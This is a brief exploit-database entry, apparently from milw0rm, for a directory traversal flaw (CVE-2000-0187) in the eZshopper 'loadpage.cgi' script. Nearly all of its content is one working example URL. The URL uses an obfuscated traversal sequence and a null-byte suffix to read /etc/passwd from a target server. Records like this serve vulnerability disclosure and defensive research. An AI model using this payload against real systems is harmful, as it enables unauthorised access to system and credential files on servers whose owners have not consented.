Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal

Related Vulnerabilities: CVE-2000-0187  
Publish Date: 25 Nov 2004
Author: Zero X
                							

                Example:

http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html

# milw0rm.com [2004-11-25]